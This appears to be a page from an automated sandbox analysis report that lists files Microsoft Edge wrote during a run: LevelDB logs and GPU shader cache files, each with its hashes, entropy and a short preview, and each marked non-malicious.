SSDEEP:	6:H+pLJ3+q2PCN23oH+TcwtfrK+IFUt8Y+pLJXZmw+Y+pLc3VkwOCN23oH+TcwtfrF:EQv1Yeb23FUt8zx/+z05eYeb3J
MD5:	6DFB0B4C9A9C201664F40996D32EFD57
SHA1:	0F1AD59CE772BF1B98AABBA65A48E041971AC714
SHA-256:	98187419E1638A9EAF442B35E4F553C3BAD14D526D8C9020C5E1ADA6E87F9798
SHA-512:	A4A243A501365B05D337483C8B48BF4C8D71BFCABB4BE75B62FF8F4D3774271676015D703CF8B0E5BDDE2118854C8DB3F18A7838D029D4DBDA9A6344F0AFE6D1
Malicious:	false
Preview:	2024/11/01-15:58:13.588 858 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/01-15:58:13.588 858 Recovering log #3.2024/11/01-15:58:13.589 858 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	4.003498289542068
Encrypted:	false
SSDEEP:	6:G0Xtqcsqcva3mF2lHSenmF2lH+l1m8Bc3mtD4tmF2llemF2lq3m8qPmt761m9yKm:G0nYvaZyGVC43oqn624Mtxjx47vgctuW
MD5:	C984C36B7A8692B89E0EBA6BB7FB6AFC
SHA1:	DA58C8A60C0AB35A46A90F48FE0A8DAE90D277EA
SHA-256:	BB097F86663A9DE05CD5B970F9CED4CE0AC4D2ABB590A61B396B7C36EDBF498E
SHA-512:	5B83B55EE087AD3F65A328BE536BB6D314545CF4125806305D9759319693617BB453A65B6FB9D7E71270615FC92D492DC7D8933D9591C374B327246660DACBC6
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... ....Q.................20_.........................20_......w...................19_.....u....................18_.........................20_...../...................20_......@C1.................19_......8lS.................18_........h.................21_.....<..[.................9_......~z..................21_.....r....................9_.....m...................__global... ....[.................__global... .t..).................3_.....B....................4_.....:.=..................3_......W2..................4_.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.180209378364622
Encrypted:	false
SSDEEP:	6:H+pLZOq2PCN23oH+TcwtfrzAdIFUt8Y+pLYhZmw+Y+pLY7kwOCN23oH+TcwtfrzS:EVOv1Yeb9FUt8zg/+zI5eYeb2J
MD5:	B25268EE99B8870068F503EBADDD3A56
SHA1:	3ACD324A7D396DB73697EC59AF45A55CAD284CB4
SHA-256:	4C9AE80683FDC3DEE5A279D3782C482CBB14AFCF2D8D6644FD3D55589BF66EF0
SHA-512:	BF67CF17752084B5EC5FFA0D1E97500D727C76079F95E09ADE403D49031B9DCD40F7A820C8402B25428B5C394C980EB9BAA9E6EC67613A3CA4A0EFEA199386FD
Malicious:	false
Preview:	2024/11/01-15:58:13.585 1da0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/01-15:58:13.586 1da0 Recovering log #3.2024/11/01-15:58:13.586 1da0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.180209378364622
Encrypted:	false
SSDEEP:	6:H+pLZOq2PCN23oH+TcwtfrzAdIFUt8Y+pLYhZmw+Y+pLY7kwOCN23oH+TcwtfrzS:EVOv1Yeb9FUt8zg/+zI5eYeb2J
MD5:	B25268EE99B8870068F503EBADDD3A56
SHA1:	3ACD324A7D396DB73697EC59AF45A55CAD284CB4
SHA-256:	4C9AE80683FDC3DEE5A279D3782C482CBB14AFCF2D8D6644FD3D55589BF66EF0
SHA-512:	BF67CF17752084B5EC5FFA0D1E97500D727C76079F95E09ADE403D49031B9DCD40F7A820C8402B25428B5C394C980EB9BAA9E6EC67613A3CA4A0EFEA199386FD
Malicious:	false
Preview:	2024/11/01-15:58:13.585 1da0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/01-15:58:13.586 1da0 Recovering log #3.2024/11/01-15:58:13.586 1da0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.660239344441727
Encrypted:	false
SSDEEP:	96:CxNhSdKNqjmBa+DdFLVFcpXYhxw6JS3hm52l:CxNS/jshzE+hxxJSRr
MD5:	E3460479BE3FDE811E7AC47352C56B1B
SHA1:	D90D406DAC1E8A41AB6C79D1B09C10431FEB49C7
SHA-256:	809A841E3F8772F8B0BE8E52E857C3DCA470C5CC396F7C8B394FD2872A2BC3FD
SHA-512:	B839370CD69974EE3D96D2F0D9289D09D5829F34910A1E333E45A2C301611F7C0964FDD9A3C971A9CE638C0B9A70A1205DB1FB66DFD09D3758A524D27B0DD92F
Malicious:	false
Preview:	............$...b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	1.1565540602464999
Encrypted:	false
SSDEEP:	192:iszD4hmTdnVy1ko0S73OxcSdYcpDFVLFfqrl/W8aFDvJmOJC:cQTdw7OCnrljqLJJU
MD5:	9D12B36329336F0EF1EE0C88B6A22CAB
SHA1:	37FD78D571A5E22B703C8FF172B16107D9935F15
SHA-256:	5E38703FE39111CE551DDD4C290DAE62662E7DFBA613086D5158E999E7D973A9
SHA-512:	1CA577DC69503866D8F5EBD48B0BD4DB08D05CE7846DB30B94DD9359EDDC82D579C691B143B8FFF244D512949884138D3F28C6C17F45B005432233BE8FB90D07
Malicious:	false
Preview:	................c...................................................................w..........www..w..w....?ww.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4202496
Entropy (8bit):	1.2214447516513913
Encrypted:	false
SSDEEP:	3072:dR+pkxLyFbFk9kH2nmopOhN5IcJUDFFt7DhJtpbR7Rhu4t8l4YrzRD3JO5XlAbl8:b
MD5:	C34BD15FA25504A8F6488449A6346454
SHA1:	801B8041E230AE135DFAA2D160D0EC1A0B25F934
SHA-256:	1CE4DF500D9245A60F418A06D10A09A4A29EE830C80D22C5E6F50B34578FF08E
SHA-512:	080B1043F6D96D6DD364D19ABD6AEBFABE0E2B0A5487D92F7026D06BE44C8AA302F0FF4FC1FB6C033F27194306715F31DA8BE9A4409B95C60C87F87B5EBD19F3
Malicious:	false
Preview:	................F......."...........................................................ww..w.w.w......w...w......w.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000005

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17520
Entropy (8bit):	4.6183166479961475
Encrypted:	false
SSDEEP:	192:NOhIVSWROBNIhjO6hjioWXF1IyEQ0LJfa8CDqpOuyGAmDgRbM0s5z4Tet:/OIfWyDJfa8CDqpOF
MD5:	B33716A22BE174DB2D2772ACE15EEE89
SHA1:	AEDD21E8006B8E3519A826605CF5E8AD7C64A102
SHA-256:	40868D915D2452E7CC17E6FAD20DB1F5792F87561DDB46B925D70824218993B3
SHA-512:	16D459D9B61802E05A81B082578EA06C913337F396DD908726717E9599FCD85B04259B56D292E45CFDEC31F225451A8F13D8E9C7FC76455A0DB56A7BD72F69AF
Malicious:	false
Preview:	....BPLG........[D..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uclamp_Stage1_c0_c0_c0_c0........_uuclamp_Stage1_c0_c0_c0_c0....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000006

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17520
Entropy (8bit):	4.621384382143791
Encrypted:	false
SSDEEP:	192:NOhIVSWROBNIhjO6hjioWXF1IyEQ0RJfa8CDqpOuys+AurwJDs0MxbY7uF:/OIfWy5Jfa8CDqpOIh
MD5:	451321E8ACDF166D80AA2A03DB194154
SHA1:	6156C12097F820CC6A0F7581B1ED044497127552
SHA-256:	51AF59E13A25BB1F0562E64CA4D657933E7131E719F1317F657ACD71623E46E0
SHA-512:	E92AE68574555FE91202EA5BC8D6882F77990EC7126A63399821242BF4162DBC76B36AD0BCC5C459550FF4755F5BCE044394E0E0C84D9806C8807C21FBEB4ABF
Malicious:	false
Preview:	....BPLG........[D..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uclamp_Stage1_c0_c0_c0_c0........_uuclamp_Stage1_c0_c0_c0_c0....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000007

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	20452
Entropy (8bit):	4.651705604339477
Encrypted:	false
SSDEEP:	192:gfUtWya2IVZwL3VKoUT4IfMUjo3CKW4IWKaMJqZXF1DPBEQ0cLiJD1p8704FVwpl:dwT4I8B6ispo0YV+pj3FVEI
MD5:	7A8319C06C44D9C96B31CB60C1C7D4F7
SHA1:	36FD3379BDAB86E5BA91DE93B0BAC008703B1A91
SHA-256:	8C23398C248AD132970846D93351144CEE0BF0590ADB07AB33AB4FCF040ECADF
SHA-512:	36FF69D3F6B65081903684C4EDD488B88E2AE3D976BF99E9E30C7829EB80C9430CB431F841130591CF25CA2FDC446E3CF4C0505A8966CC9569EA969FE6E477CB
Malicious:	false
Preview:	....BPLG.........O..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000008

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	19376
Entropy (8bit):	4.680712822162844
Encrypted:	false
SSDEEP:	192:NlWya2IVZwL3VKoUT4I3MUjoO2cggASr1ZXF1DPBEQ0cLi+xcRO19vv7rr3Fk3Oj:twT4IZB6iD2RO1xvj3FkC4
MD5:	E1503B31FFCE164FECB06E1FCD3209B1
SHA1:	133C0D189BBBC4F67DEF083F875487131D4F6B0B
SHA-256:	23E6F7D4B3F01F178C716EC8B998787E250B215F74AB336C489F40E6AEA9D74C
SHA-512:	8663D80CB3D483813B0560A80FCDE64F346679153DB0BB47152E7E28113A9FF2CE1951AD2270D9A0052DB33C1FE5F785BF25D0E4D7A9F65CFE47F791F402587C
Malicious:	false
Preview:	....BPLG.........K..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000009

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	25348
Entropy (8bit):	4.558367647989921
Encrypted:	false
SSDEEP:	384:7IdeLwT4IPSjzqB6ilKC4NIF4wZyWlUj3Fuorsq3:7TGB6e3Uj3Ffs
MD5:	C13B870280CAC47C207D547DAC68E8F2
SHA1:	22A9E22887159864E9FCE983A5580209F968F05C
SHA-256:	C34E8955E9C09A35E8D59D5E4D4E7E19F59B61D545EC5709981BA65850B66BA8
SHA-512:	534E715712498C9EC70DF450B1C81A0C91E0D91B6A70F023BBD4F9B37C57BD11AB9A0E6810BC6A0D47035967671D747E6C085E00E3B9DECC4E1D2808762FEE06
Malicious:	false
Preview:	....BPLG.........b..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000a

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	19296
Entropy (8bit):	4.675678997147391
Encrypted:	false
SSDEEP:	192:9lWya2IVZwL3VKoUT4IzMUjoO2cggASr1ZXF1DPBEQ0cLi+xcRO1evv7rr3Fk3Ox:dwT4INB6iD2RO1Gvj3FEC4Q
MD5:	BA2A93863EEA09C22118D0B79F68AD6E
SHA1:	513AE056A666C7A3B03CD4319B3054334BA82B96
SHA-256:	DB4D0D114835F9A9AE4F79C657E3331EA6A40D6ED2D4728CCEB0456E9DF88750
SHA-512:	2EAF7EF9CF5899EA99F5E22CA63129E2D36BC582DA07BB1A7D9F28AA370D907BBAF940017064B1634D1848224BF6BB303A7E712A06B0995337FE157F0412A273
Malicious:	false
Preview:	....BPLG........IK..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000b

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17676
Entropy (8bit):	4.703620471952356
Encrypted:	false
SSDEEP:	192:TYnWya2IVZwL3VKoUT4IpMUjoNZnJSMZXF1DPBEQ0cLinhbS7rr3Fk3OaIaqZ9:uwT4IsB6i6BSj3F5
MD5:	AC32FE22EA82A59C7F00E7F60A22473C
SHA1:	3BB1735599B10D850D125C13EAE277BA9D5ED6F1
SHA-256:	49B514F523D9B6D40E33AC7D6F084E9212EAEA5BDA24D16C74AF0034660E253B
SHA-512:	3791F5210F05DF1DB215F9FDC8D00C2D5C7E773E3F29538DCEC21EF64FE8C36E7905349D36D1DAC9973784C421EB73D5FE7B45B83781F38C60FB829019816C07
Malicious:	false
Preview:	....BPLG.........D..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000c

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17772
Entropy (8bit):	4.572650747127991
Encrypted:	false
SSDEEP:	192:MfU4rIVtWMOlwIwZq/jo3CKW4IWKaMJyMuhfLZ+Rn/+7gsFT1Te5wfhK75qUj21N:i+I4hO4gcRTPf+5P
MD5:	A40460C33EC7E3F2735FA818D485CA1E
SHA1:	C79DC60D1FB7C8F5580902AD6882348F1F5C4C83
SHA-256:	0BF0FA15CFAB0ED536EA5581E3855F87F7534CB9EDF95910141108437E87A3E2
SHA-512:	D31C5C7319808B0EBA8A2814D4B6746C83DCA2A0C854109619765C4248960321DBB033E22B1BB73C64A8079660978FF980FBC40F373695CA6E99FB1AC9BF6EB6
Malicious:	false
Preview:	....BPLG........UE..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................R..............color........_ucolor................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0_c0_c0_c1........_uumatrix_Stage1_c0_c0_c0_c1..............................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000d

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	23752
Entropy (8bit):	4.819380528046633
Encrypted:	false
SSDEEP:	192:dymgWrtI8mtWXOmPm4lcOmOiqzrzFcIVM/V/jomcAd7WXF13PBEQ0cLIfdkGk4Kt:dTCppIqW+iGkGwcjWV8
MD5:	A68BFC13F4C3D3CF112188BCA0C91CCF
SHA1:	741CC44B6DDD35D38A44558918C1002D5B331AEC
SHA-256:	4B3CF5D53A0F525C952D31CF14794817F6D880234A61458B68C7607537DDE156
SHA-512:	27BB4106B3F5EA8E7E555007C19F41B57B3D5EB41542E70B28499E711B79B57A5D09B6E2D5EFCF9CCDD5DC7E164FF7F1049720B44B9815C74FB322206CC44440
Malicious:	false
Preview:	....BPLG.........\..94e127570f3a....................................................................................................................................R..............radii_selector........_uradii_selector................................................................................................................R..............corner_and_radius_outsets........_ucorner_and_radius_outsets................................................................................................................R..............aa_bloat_and_coverage........_uaa_bloat_and_coverage................................................................................................................R..............skew........_uskew................................................................................................................P..............translate........_utranslate................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000e

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	16688
Entropy (8bit):	4.652908177208403
Encrypted:	false
SSDEEP:	192:hCOMIVEwLBoqOvCIt+q/joO2cggASr9afL+cEvfqdvk67tNd+bK27sDk:hTBosInQifqdvk6fdt
MD5:	1028EB04E1BFE5AAD7A447583A6CF6F5
SHA1:	0692BF70C64E26AA4FAFDDA507A139F16544B3AF
SHA-256:	50F0EE8CB2F832A0F7D90592F09E5482059F154D8819960933F52E2AA2984754
SHA-512:	340CD2822901B30047AA58F2C98BA1052A4B775D072AD49F4C3A023681A8E5838EA59436613FABC1029C9E67DC37088B20FA7C1B34D476513760ECB104B4021C
Malicious:	false
Preview:	....BPLG.........A..94e127570f3a....................................................................................................................................P..............inPosition........_uinPosition................................................................................................................R..............inColor........_uinColor................................................................................................................R..............inCircleEdge........_uinCircleEdge........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................R..............ulocalMatrix_Stage0........_uulocalMatrix_Stage0................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000f

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17956
Entropy (8bit):	4.57996103746788
Encrypted:	false
SSDEEP:	192:jNnrTqNIVi24Hs5O9IVrSIig/DPcBx7s6aVH1MPB+Q00Klm0vQ83GNj+EtLDNwv+:vzVrSIas6CVcWm0vVGNj3LD
MD5:	962F349741008247E3102A8A76005FE1
SHA1:	2A68830CE67DCB0E029597B2163D78C7BDA87D7E
SHA-256:	9A8A7401D7090869322E9FB7A3CADEEB2502DFD7D5BC25355ADC6FE98B2C5F83
SHA-512:	5752A83D899A971E44142BEE400501F44AA06F466B171AF57CEEB045EF95F25E632688472A42ED23CC68D1BE476E7DCB0F7FD9A828631E2699A137B279236B5B
Malicious:	false
Preview:	....BPLG.........F..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................R..............color........_ucolor................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0_c0_c0_c0_c0........_uumatrix_Stage1_c0_c0_c0_c0_c0........................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000010

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	16768
Entropy (8bit):	4.657340115135669
Encrypted:	false
SSDEEP:	192:xCOMIVEwLBoqOvCII+q/joO2cggASr9afL+cEvfqdck67tNd+AKn77D:xTBosIAQifqdck6fdK
MD5:	DF0154933C59495BEF7535AF7C8D89C4
SHA1:	04E91427B6A42F62AAAE52B2367D8A93A882E72A
SHA-256:	F08A9BA83954A9C67806C949CEBE229DBBDCF36BCF2DDE94BD2C02AC846C6FD7
SHA-512:	285EB37C83BF4CC6B012011A88AEAA266084FE24201F474C01B48F5668F899C7FA182C0AC79853A3C5D27B9A957F93DE18ABDD5A04F1FACC4D22D2D6B7150393
Malicious:	false
Preview:	....BPLG........iA..94e127570f3a....................................................................................................................................P..............inPosition........_uinPosition................................................................................................................R..............inColor........_uinColor................................................................................................................R..............inCircleEdge........_uinCircleEdge........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................R..............ulocalMatrix_Stage0........_uulocalMatrix_Stage0................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000011

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17844
Entropy (8bit):	4.625312404240564
Encrypted:	false
SSDEEP:	192:YEfUuMIVEwLBoqOvCIq+q/jo3CKW4IWKaMJsafL+MzHva7YsFpP4X7tNd+75W1JM:YcBosIjQnUYcpPwfd+W
MD5:	A970939CE966496DB24B526D140CB2B4
SHA1:	3CCD5DCC3E71CF559A0BD6CD130BB2E612CBAD44
SHA-256:	CCE1A1DD9A906F33E530E1C4C3FF6ADE3AEA6BCC6BCB0D0D6946BD1925849AF4
SHA-512:	45455895F1138278852825661A158C861CC3DC697E828355CE622F540A887C1EFAAF1FDED7C12DF38CBE31436FAE0456597A4C72DBC9A81E113F604163497982
Malicious:	false
Preview:	....BPLG.........E..94e127570f3a....................................................................................................................................P..............inPosition........_uinPosition................................................................................................................R..............inColor........_uinColor................................................................................................................R..............inCircleEdge........_uinCircleEdge........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................R..............ulocalMatrix_Stage0........_uulocalMatrix_Stage0................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000012

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	26096
Entropy (8bit):	4.741395300623393
Encrypted:	false
SSDEEP:	192:Hgn97bX/Dj3DWrtI8mJWXOmPm4lcOmOiqzrzF2Ij6Mq/jo3uWyYIyWGcJs3fLIBs:HFCplIpDBJxXojqtuM
MD5:	0587006F42BFF0553F0A17A20712C5D5
SHA1:	D0240A50CD84F3491C1600A8E37DE7F5676EE032
SHA-256:	1F9C96189B266A6FBBE804741706560A44122EAAFFF5F4D06B89C8C70C4C7681
SHA-512:	9B1F6BAF43AAE38BCECFFE2845DEE416B6E2968FB5CDE15CAA255144602E0FDF790843A1E0D87B7F98449ED0500A95832152026567C5058E8D658F438FD475FB
Malicious:	false
Preview:	....BPLG.........e..94e127570f3a....................................................................................................................................R..............radii_selector........_uradii_selector................................................................................................................R..............corner_and_radius_outsets........_ucorner_and_radius_outsets................................................................................................................R..............aa_bloat_and_coverage........_uaa_bloat_and_coverage................................................................................................................R..............skew........_uskew................................................................................................................P..............translate........_utranslate................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000013

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	19324
Entropy (8bit):	4.624082526843055
Encrypted:	false
SSDEEP:	192:/WfU1MIVEwLBoqOvCIF+q/jo3CKW4IWKaMJyMuafL+XY9c7w8FJyiZYe7tNd+xv+:/DBosI6QJ4wsJBZDfdGwi
MD5:	CBF7B67D12F90EFA930597A7E39A9394
SHA1:	C0A56D319E93076050EB2C7B980955426047FDD1
SHA-256:	AD76EE474062AA9F05BC04375FE347FC006FF953F8A162B9F23F080C37412BB5
SHA-512:	BEB1CCAFE78D302FF1FA0ACE6438CDA4D9A8427B4B88D459C76FA5E5E4158ED3220FF2C044CB99E87D830C1EBFD33D788BCA1E4827FB1F73088EA4723E96066B
Malicious:	false
Preview:	....BPLG........eK..94e127570f3a....................................................................................................................................P..............inPosition........_uinPosition................................................................................................................R..............inColor........_uinColor................................................................................................................R..............inCircleEdge........_uinCircleEdge........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................R..............ulocalMatrix_Stage0........_uulocalMatrix_Stage0................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000014

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	20548
Entropy (8bit):	4.539761955578225
Encrypted:	false
SSDEEP:	192:f1tIVSWROBNIUBskIzRIXWXF1IyEQ0j9jgWp6YKNfblR3geT0pOuy1DEZhhaqh5H:WOIOWyZe3geT0pO
MD5:	2AC17C70B835E8D94F913F021969F610
SHA1:	ABF04557D9A57EAA1A4C2A61C396311DD08B00E2
SHA-256:	E55C74A8AFA37688FC1F943FB3D1A7719EC08304D65BC43EF1B50B712BD11481
SHA-512:	6E1D7E137093B067CF04CA4B828704A2883B66E6786B6135DB82D88B6D8666CE710AC611CE92FB24041D1E704AE24A96B3E5216390ACD43C2D8152D110CF9043
Malicious:	false
Preview:	....BPLG......../P..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uborder_Stage1_c0_c0_c0_c0........_uuborder_Stage1_c0_c0_c0_c0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000015

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	20548
Entropy (8bit):	4.544307437732593
Encrypted:	false
SSDEEP:	192:f1tIVSWROBNIUBskIzRIXWXF1IyEQ0j9jgpch1Kg8uyR3geT0pOuyfDMpJxqChJ/:WOIOWyTG3geT0pO
MD5:	C2CE015FB30DF987ECDE06C621C935A4
SHA1:	4A70A2CA2939C0F758BEF48356BBCA46D5E4332E
SHA-256:	2075C383C47F0730FBD25D901D30A5F35B96653154C6EC44DE7381D978D8401B
SHA-512:	243C6F66DF6AF23E67E84F5A23033ECCD8CE05CC7F2A84384478D44E31382E9E732721A224EA84CEC2018F964DBA70CA67607E51CA75755C5CD044CE4BE3B8AB
Malicious:	false
Preview:	....BPLG......../P..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uborder_Stage1_c0_c0_c0_c0........_uuborder_Stage1_c0_c0_c0_c0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000016

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17308
Entropy (8bit):	4.633965000198983
Encrypted:	false
SSDEEP:	192:tOhIVSWROBNIay6hjioWXF1IyEQ0G4a8CDIpOuyeAu1/PIQ1aqTVVxc:fOI+WyO4a8CDIpOt
MD5:	84DDCF1F2127294D6CDAB222D7F6D5CC
SHA1:	9C9838CCBC6035664DE0E4D4EB31CF760DD6AD69
SHA-256:	299A62EE002A66E26ED1E2877B92D9B516ED52C7F2F1A3F89F8519B8C8AF4F88
SHA-512:	12BFA80A5467219EB429320D2664666E2236464797A1E6570C9536F927C6D0D9FE77839B141C2D4853F25584C58AE1599CD0788FDCF9A181BC1C1693152BD6FF
Malicious:	false
